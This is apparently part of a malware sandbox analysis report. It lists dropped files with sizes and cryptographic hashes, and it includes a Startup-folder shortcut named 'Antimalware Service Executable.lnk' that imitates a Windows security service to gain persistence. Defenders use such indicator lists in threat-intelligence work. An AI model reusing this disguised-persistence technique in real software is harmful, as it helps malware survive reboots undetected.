MD5b0a85f07903eaad4aace8865ff28679f
SHA1caa147464cf2e31bf9b482c3ba3c5c71951566d1
SHA256c85c7915e0bcc6cc3d7dd2f6b9d9e4f9a3cf0ccefa043b1c500facac8428bfd5
SHA5127a650a74a049e71b748f60614723de2b9d2385a0f404606bcb22ae807e22a74c53cf672df9e7a23605dfff37865443a5899eafea323134a818eb59c96e0f94bd
-
Filesize
1KB
MD5b5290e8c2492ea1812a2b7ebb3c70506
SHA1767dcfe668d580351c8615eb85d0a31f58820d31
SHA25662d7ba496f7f8ef79daabebfef56fcf21e7bbaac3a75121bde26401a6a1664ff
SHA512f3bfe19c0d66df393c8925f17ab5054d7c6f940a17252f682fae7211c39f3b1e9d5c10bea17b060534d23822d00f3daf3eac42b803ca6f525f1850a24619d937
-
Filesize
1KB
MD500b5dac0faabd946e46411c68c4e4b54
SHA1ebffe4f7312c6a3ea1a5bfb8e36e3716b73a71de
SHA256ba0bccd5b683d96eda6d4000424147e0dddaa1e6c87dd65566721f4552397133
SHA51225a291425f8ac169440d5a6250b2eae67261d599bd35aa3e02c742deed5aedea7d4e88910947116068759e3b8cb5fd82c29b6360d86b663fc536b09bd69ac9c0
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
289KB
MD52fbb066a05c1ef9460e97aaedbe0e45e
SHA1d5d26c284cea1437decf880c20a39b16e7e6a63a
SHA256ab4cecb9a0cff2c60bcac17ce47d47c1f322e27668ebc446825c6882472bb01d
SHA51222ba0f92821aef8c395cddc3ffee007541fafa3f797f2b2dd1695b3f42cf7423ed1f3eadd522213f62533ee7d43087e96047d6e44dd5f2ea9fa4afc157b7af9e
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Antimalware Service Executable.lnk
Filesize888B
MD511b9efcdfb3533481ed88f33c2f9354d
SHA18d61d5792f5e068a9ebf11028d24240e9f71a710
SHA256d83e5357c29935a09cf1e41028d26f6f27cdaf84b681d6153ce811affa1d0c8b
SHA512944d4afbff27b71527a7b7b013667228a5b913955115ca3da9240d65d227a768b3fff36a358e897216ccb9fa18df76a533ed9ade535a0073f2fdebb4f312b261
-
Filesize
19.0MB
MD5f139956e3513372dfedb48be8c5f20d2
SHA110f96e4db74379253e344ab946cd0277b9e3399b
SHA256c8953cfb225aee2562f4488207d03aa8d64a742ab9a8685cf68c7df9b3fced43
SHA5121057fb10d053f5c98fc379ee01bd01f9771fe8cd085c735e61ad58a07d4184454814eb46172ca934cdb4f26f998cb9826d2dcefed4bf64efbc55445bf7555858
-
Filesize
286KB
MD5172102632622276b14db160162216da2
SHA1d43e5499a72085f8f088b8cdec03d0e2e848354b
SHA256db2780fbfa5ef72359db0a4eaa4d49a2ba08b628820803d10e87d1942f5f242d
SHA51229a62c255304d04d8d7b96bb66e9dca58365b56f73ec64dbcba9bec15af3e771fc856db7328918d9ede81dbfa5d5e7b5157d3366833c1cf5ff0cc3ffe57c9686
-
Filesize
227KB
MD50c5a658e2dd610701dfdda4af941cedf
SHA1d90c4f66c708206b2d62e84923ea5746f2aa37ff
SHA2563c40b379fa1a86269b0f31473a95917e2d940a0ad11c95f0209518d4e32afc60
SHA512557a1d3fdf5c77bbe97b7d1eabb09ddcf44387c17ee22506ec0e2e47a20814a4f067ed225384b40244e013b79866034b0efb1b3f890cde68f940132e10714091
-
Filesize
61KB
MD5114dc24354f0c5ed1c34c1e21abc72fd
SHA1e311f13272546541bcb93454367c1f958deba7e1
SHA256c36165bdc7f50ae6366f31fcda7d96b4eb2ec4bfc91f4a75d1347eb74c599a3f
SHA51223ca2599c8f08c7690a2e7edc5835c72ac2b985b0c40a33abee4e6cd8e87ef1604d26087f69f91606f2842bbb3ef593733727a56964e49d00cb2e57422f25e96